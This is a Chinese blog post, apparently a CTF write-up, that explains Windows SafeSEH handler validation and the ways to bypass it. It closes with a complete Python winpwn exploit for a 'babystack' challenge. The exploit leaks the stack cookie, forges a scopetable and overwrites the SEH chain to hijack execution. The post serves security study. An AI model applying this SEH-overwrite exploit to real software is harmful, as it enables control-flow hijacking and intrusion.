SafeSEH

于 2020-09-27 19:56:25 发布
阅读量9.8k 收藏 1
点赞数
分类专栏: Windows
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/108835099
版权

简介

safeseh是在seh的基础上进行的改进, 是异常处理的关键结构, 不同的编译器可能使用的safeseh不一样, 但是基本的思想都一样;

safeseh验证

异常处理链起始位置储存在fs:[0]的位置, 在进程的DEP是开启的情况,有两种异常处理函数被异常分发器认为是有效的:

  1. 异常处理函数在进程映像的SafeSEH表中,并且没有NO_SEH标志。

  2. 异常处理函数在进程映像的可执行页,并且没有NO_SEH标志,没有SafeSEH表,没有.NET的ILonly标志。

在进程的DEP关闭的情况下,有三种情况异常处理函数被异常分发器认为是有效的:

  1. 异常处理函数在进程映像的SafeSEH表中,并且没有NO_SEH标志。

  2. 异常处理函数在进程映像的可执行页,并且没有NO_SEH标志,没有SafeSEH表,没有.NET的ILonly标志。

  3. 异常处理函数不在当前进程的映像里面,但是不在当前线程的堆栈上;

绕过方式:

  1. 在堆中绕过:即将异常处理函数放在堆里面,但是这道题不提供堆,而且开启了dep保护也是行不通的

  2. 在未开启safeseh模块中绕过:这个程序是静态编译的,并没有别的模块 在加载模块之外的地址

  3. 伪造scopetable;

scopetable内容如下:

.rdata:0047ACC0 stru_47ACC0     dd 0FFFFFFE4h           ; GSCookieOffset
.rdata:0047ACC0                                         ; DATA XREF: sub_407F60+5↑o
.rdata:0047ACC0                 dd 0                    ; GSCookieXOROffset ; SEH scope table for function 407F60
.rdata:0047ACC0                 dd 0FFFFFF0Ch           ; EHCookieOffset
.rdata:0047ACC0                 dd 0                    ; EHCookieXOROffset
.rdata:0047ACC0                 dd 0FFFFFFFEh           ; ScopeRecord.EnclosingLevel
.rdata:0047ACC0                 dd offset loc_408224    ; ScopeRecord.FilterFunc
.rdata:0047ACC0                 dd offset loc_40822A    ; ScopeRecord.HandlerFunc

通过观察程序初始化可以看出scopetable的存储方式:
scopetable

babystack

# from pwn import *
from winpwn import *
def get_data(addr):
    p.recvuntil("Do you want to know more?")
    p.sendline("yes")
    p.recvuntil("Where do you want to know")
    p.sendline(str(addr))
    buf = p.recvuntil("value is ")
    data = int(p.recv(10), 16)
    return data


name = "C:\\Users\\test\\Desktop\\Win_Pwn\\babystack\\babystack.exe"
p = process(name)
p.recvuntil("stack address = ")
stack = int(p.recv(8), 16)
print("buf_stack_addr: ", hex(stack))
p.recvuntil("main address = ")
base_addr = int(p.recv(9), 16) - 0x0b0
print("base_addr: ", hex(base_addr))
security_cookie = get_data(base_addr + 0x3004)
print("security_cookie: ", hex(security_cookie))
ebp = stack + 0x9c
next_seh = get_data(ebp - 0x10)
cmd_addr = base_addr + 0x38d
execpt4 =  base_addr + 0x460
scope = (stack+4) ^ (security_cookie)
canary = security_cookie ^ ebp
print("canary: ", hex(canary))

sturct = p32(0xffffffe4) + p32(0x0) + p32(0xffffff20) + p32(0) + p32(0xfffffffe) + p32(base_addr + 0x348) + p32(cmd_addr)
pay = "aaaa" + sturct +  "b"*96 + p32(canary) + "c"*8 + p32(next_seh) + p32(execpt4) + p32(scope) + p32(0)

p.recvuntil("Do you want to know more?")
p.sendline("hi")
p.sendline(pay)
p.recvuntil("Do you want to know more?")
p.sendline("yes")
p.recvuntil("Where do you want to know")
p.sendline("0")
p.interactive()
钞sir
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《0day安全》亡羊补牢:SafeSEH
weixin_50287973的博客
09-12 204
本节所有关于绕过 SafeSEH 机制的讨论均不考虑 DEP 的影响。 攻击返回地址绕过 SafeSEH 利用虚函数绕过 SafeSEH 和上一章介绍的类似,通过攻击虚函数表来劫持程序流程,这个过程不涉及任何异常处理,SafeSEH 也就只是个摆设。 从堆中绕过 SafeSEH 程序中断前刚刚完成堆中空间的申请,此时寄存器 EAX 中存放着申请空间的首地址,所以 0x328b8也就是 shellcode 的首地址 被溢出的字符串起始位置为 0x0013FE8C S.E.H 异常处理函数指针位于0x001
关于Safeseh
爱码农爱生活
03-16 213
么是Safeseh 以前堆栈溢出在的WINDOWS系统中一直都是安全问题的核心,其中覆盖seh的技术早为人熟知。Safeseh是一项保护和检测和防止堆栈中的seh被覆盖而导致利用的技术。 Safeseh是VISTA的新技术吗? Safeseh并不是VISTA的新技术,Safeseh是xp sp2就已经引入的技术。但是由于Safeseh需要.net的编译器编译的image才支持,而xp ...
SafeSEH原理及绕过技术浅析
热门推荐
magictong的专栏
04-27 1万+
SafeSEH原理及绕过技术浅析     作者:magictong 时间:2012年3月16日星期五   摘要:主要介绍SafeSEH的基本原理和SafeSEH的绕过技术,重点在原理介绍。 关键词:SafeSEH;绕过技术;异常处理   目录 前言 SafeSEH的保护原理 (1)      二进制层面 (2)      系统层面 怎么关掉编译器的SafeSEH支持
SafeSEH基本概念+ 从堆区绕过SafeSEH学习
weixin_30628077的博客
09-09 120
SafeSEH 原理:在程序调用异常处理函数前,对要调用的的异常处理函数进行一系列的有效性检测 VS2003后续版本 默认启用的 编译器将所有的额SEH中所有的异常处理函数的值提取出来编入一张安全SEH 表 将这张表放到程序的映像中 当程序调用异常处理的时候会将函数地址与安全SEH表进行匹配 检查调用的异常处理函数是否位于安全SEH表 VS2008 命令行: 好像只有rele...
PESecurity:PowerShell模块,用于检查是否已使用ASLR,DEP,SafeSEH,StrongNaming和Authenticode编译Windows二进制(EXEDLL)
03-03
用于检查Windows二进制文件(EXE / DLL)是否已通过ASLR,DEP,SafeSEH,StrongNaming,Authenticode,Control Flow Guard和HighEntropyVA编译的PowerShell脚本。 Import the module Import-Module .\Get-...
从零开始学习软件漏洞挖掘系列教程第五篇:突破SafeSeh防线1
08-03
【软件漏洞挖掘与SafeSEH】 在软件漏洞挖掘领域,了解并掌握如何绕过SafeSEH机制是一项关键技能。SafeSEH,全称为“安全异常处理”,是微软为增强系统安全而引入的一种防御措施,旨在防止攻击者通过覆盖堆栈上的异常...
特效代码在线生成 v2.1
10-18
"特效代码在线生成 v2.1"是一款由爱尚互联-ashl.cn开发的ASP源码程序,旨在帮助用户快速生成各种特效代码。这个程序可能还存在一些小问题,需要不断进行更新和完善,以提供更稳定和高效的服务。...
checksec:用于ASLRDEPSafeSEH检查的windbg扩展
05-18
checksec - Check modules ASLR/DEP/SafeSEH settings 0:001> .load C:\Users\debug\Desktop\checksec\Debug\checksec.dll0:001> !checksecImage Base Size ASLR DEP Safe SEH Module Name 0x00740000 0x00030000...
ExploitDev:各种ASM,C和C ++工具,shellcode和利用实验
03-30
8. **SafeSEH (Structured Exception Handler Override)**: SafeSEH是Windows的一项安全特性,旨在保护异常处理链不被恶意代码篡改。在exploit开发中,需要了解如何绕过这个保护机制。 这个"ExploitDev-master...
周玉川-2017221302006-第三次作业1
08-03
- SafeSEH 的有效性依赖于DEP,DEP被绕过后,SafeSEH也可能失效。 - 许多第三方库未启用SafeSEH,攻击者可以利用这些库来绕过保护。 - 可以通过在堆区布置shellcode,绕过指向堆区的异常处理函数。 以上就是关于...
周玉川-2017221302006-第三次作业2
08-08
5. **SafeSEH (Safe Structured Exception Handling)**: SafeSEH 是 Windows 上的一种异常处理机制,它只允许执行预定义的异常处理程序。在异常发生时,系统会检查处理函数是否在安全列表中。不过,SafeSEH 依赖 DEP...
C语言精典版本C程序设计语言
12-11
C程序设计语言C语言精典版本 目 录 译者序 序 第1版序 前言 第1章 基本概念 1.1 入门 1.2 变量与算术表达式 1.3 for语句 1.4 符号常量 1.5 字符输入输出 ... C的适用范围的扩大、在这些年中语言的改变和各个组织...
exception.zip
06-11
在本压缩包“exception.zip”中,包含了作者对异常处理机制和safeSEH(Safe Structured Exception Handling)的个人理解和实践案例,这对于学习和研究0day安全技术的人来说是宝贵的资源。 异常处理是编程语言中用于...
PESecurity-master
08-30
这些防护机制包括SafeSEH(Structured Exception Handling Overwrite Protection)、Authenticode(微软的一种代码签名技术)、DotNET(微软的.NET框架)相关的安全特性以及ControlFlowGuard(CFG,控制流守卫),...
0day 第11章--11.1节:SafeSEH保护原理
I have a dream
11-01 423
@TOC 1、SafeSEH原理很简单: 在程序调用异常处理函数之前,对要调用的异常处理函数进行校验,当发现异常处理函数不可靠时停止对异常处理函数的调用。 编译器在编译程序时将程序所有的异常处理函数地址提取出来,编入一张安全的SHE表,并将这张表放到程序的映像里面。当程序调用异常处理函数时将函数地址与安全SHE表进行匹配,检查调用的异常处理函数是否在安全的SHE表中。 2、SafeSEH机制的运行...
《0day安全》——亡羊补牢:SafeSEH
sunr_的博客
08-27 305
启用该链接选项后,编译器在编译程序的时候将程序所有的异常处理函数地址提取出来,编入一张安全 S.E.H 表,并将这张表放到程序的映像里面。当程序调用异常处理函数的时候会将函数地址与安全 S.E.H 表进行匹配, 检查调用的异常处理函数是否位于安全 S.E.H 表中。 攻击返回地址绕过SafeSEH 没开GS,开了SafeSEH,直接攻击函数返回地址 利用虚函数绕过SafeSEH 不涉及异常处理,SafeSEH没有参与感 从堆中绕过SafeSEH ...
SafeSEH原理与对抗
whatday的专栏
10-09 6113
SafeSEH原理 在 Windows XP sp2 以及之后的版本中,微软引入了 S.E.H 校验机制 SafeSEHSafeSEH 需要 OS 和 Compiler 的双重支持,二者缺一都会降低保护能力。通过启用 /SafeSEH 链接选项可心使编译好的程序具备 SafeSEH 功能(VS2003 及后续版本默认启用)。该选项会将所有异常处理函数地址提取出来,编入 SEH 表中,并将这张表...
SafeSEH 对异常处理的保护原理
重文-技艺山海经
05-14 1471
SafeSEH 对异常处理的保护原理 在 Windows XP sp2 以及之后的版本中,微软引入了 S.E.H 校验机制 SafeSEHSafeSEH 需要 OS 和 Compiler 的双重支持,二者缺一都会降低保护能力。通过启用 /SafeSEH 链接选项可心使编译好的程序具备 SafeSEH 功能(VS2003 及后续版本默认启用)。该选项会将所有异常处理函数地址提取出来,编入 S
vs2022怎么开safeSEH
最新发布
03-27
在Visual Studio 2022中,开启SafeSEH(Safe Structured Exception Handling)可以提高应用程序的安全性,防止恶意代码利用异常处理机制进行攻击。下面是在VS2022中开启SafeSEH的步骤: 1. 打开你的项目,在解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值